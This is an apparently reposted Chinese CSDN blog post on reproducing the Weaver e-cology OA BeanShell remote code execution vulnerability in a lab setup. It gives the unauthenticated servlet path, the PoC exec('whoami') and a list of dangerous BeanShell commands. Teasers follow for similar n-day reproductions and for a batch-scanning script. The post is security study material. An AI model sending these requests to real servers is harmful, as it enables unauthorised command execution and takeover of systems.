泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

最新推荐文章于 2024-08-10 16:05:10 发布
转载 最新推荐文章于 2024-08-10 16:05:10 发布 · 781 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/mrhonest/p/11575118.html
文章标签:

#java

本文介绍了泛微e-cology OA系统中Beanshell组件存在的远程代码执行漏洞,主要涉及影响版本为9.0及以下。文章通过详细步骤展示了漏洞的复现过程,并提供了POC(Proof of Concept)代码。此外,还引用了相关资源以供进一步研究。

靶机

影响版本 泛微e-cology<=9.0

https://github.com/jas502n/e-cology

部署

1431916-20190923214602775-2044439720.png

复现

/weaver/bsh.servlet.BshServlet

POC

exec("whoami")

1431916-20190923214914336-1442389968.png

这是BeanShell命令的其他一些示例

source(),run()-将bsh脚本读入该解释器,或在新的解释器中运行
frame()-在Frame或JFrame中显示GUI组件。
load(),save()-将可序列化的对象加载或保存到文件中。
cd(),cat(),dir(),pwd()等-类似于Unix的shell命令
exec()-运行本机应用程序
javap()-打印对象的方法和字段,类似于Java javap命令的输出。
setAccessibility()-打开对私有组件和受保护组件的无限制访问。

最低0.47元/天 解锁文章
ddr12231
关注
【nday】复现OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 3604
e-cology是一款由网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1267
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
协同商务系统_ecology OA Beanshell组件远程代码执行漏洞复现
weixin_39645041的博客
12-12 897
0X1漏洞概述e-cologyOA协同商务系统是专为大中型企业制作的OA办公系统,支持PC端、移动端和信端同时办公,完美的解决了距离的问题,内置大量智能化办公工具,让各部门之间的协作变得畅通而又简单,是中大型企业办公的必备神器。e-cology依托全新的设计理念,全新的管理思想为中大型组织创建全新的高效协同办公环境,让组织内部的沟通协助畅通无阻!为组织构建一个内部的baidu...
CNVD-2022-10270漏洞复现
weixin_42618425的博客
02-18 3754
CNVD-2022-10270漏洞复现
e-cology OA Beanshell组件远程代码执行.md
04-11
e-cology OA Beanshell组件远程代码执行
e-cology OA Beanshell组件远程代码执行漏洞复现
ranuy阮的博客
09-23 2915
1.e-cology OA简介 e-cologyOA协同商务系统是专为大中型企业制作的OA办公系统,它支持PC端、移动端和信端同时办公,其内置了大量智能化办公工具,使得各部门之间的协作变得畅通而又简单。总而言之,它是一个办公系统。 2.漏洞概述 2019年9月17日,OA更新了一个安全问题,修复了一个远程代码执行漏洞 e-cology OA 系统自带 BeanShell 组件且...
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 2867
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现
Blog of Jaoing
04-23 692
友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品......
春秋云境:CVE-2022-22963[漏洞复现]
最新发布
如有错误感谢斧正
08-10 1700
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现
OA系统远程命令执行漏洞
chaojixiaojingang
08-21 6371
1.漏洞描述 OA办公系统存在远程命令执行漏洞,由于办公系统的Java Beanshell接口可被未授权,攻击者通过调用该Beanshell接口,构造特定的HTTP请求绕过本身一些安全限制造成远程命令执行,获取服务器完全控制权限。 2.漏洞复现 1)访问办公系统:http://xx.xx.140.21:8090/login/Login.jsp?logintype=1 2)在URL后添加/weaver/bsh.servlet.BshServlet,得到命令执行环境: ...
漏洞预警】e-cology OA系统远程代码执行漏洞及其复现
Summer's blog
05-13 1万+
目录 0x00前言 0x01漏洞描述 0x02漏洞复现 0x03漏洞POC 0x04影响范围 0x05漏洞防护 0x06免责声明 0x00前言 2019年9月19日,e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用...
e-cology OA 远程代码执行漏洞复现(亲测有效)
热门推荐
花花的博客
12-09 1万+
你踩过的坑,我都填过,哇哈哈哈哈哈 0x00前言 整个环境搭下来,安装的东西有点多,遇到的问题也不少,说复杂,但是搭完感觉还好并不难。大家不要觉得很难懒得搭,一定要耐心一步一步的搭建。 0x01漏洞简介 1.漏洞成因 该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,也就是说可以执行任意命令 2. 影...
web漏洞——rce代码及命令执行漏洞
haoaaao的博客
04-09 1525
//命令执行及代码执行,本质都是执行,但一个执行脚本代码,一个执行 系统命令。 1、eval函数 把括号代码当作php执行 2、命令执行漏洞形成条件: 可控变量、漏洞函数
Web漏洞-RCE代码及命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
ranzi.
04-03 2405
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
WEB漏洞-RCE代码即命令执行漏洞全解
xhscxj的博客
01-27 1470
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞。同样调用系统命令处理,将造成命令执行漏洞漏洞形成的条件: 1.可控变量 2.漏洞函数 ...
【严重】 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1372
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业信机器人获取一手的情报。 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。协同管理应用平台(e-cology)是一套企业大型协同管理平台。
e-cology8前台sql注入漏洞复现
afei001
04-23 3280
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 FOFA实战复现 4.2e-cology8前台sql注入POC 4.3 ecology8_front-desk_SQLi_EXP.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。 1.漏洞概述 e-cology8是一款OA办公产品。但其版本ecology8存在前台SQL注入。可获取系统管理员密码hash。该该漏洞是在2021年04月08日,HW第一天爆出。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值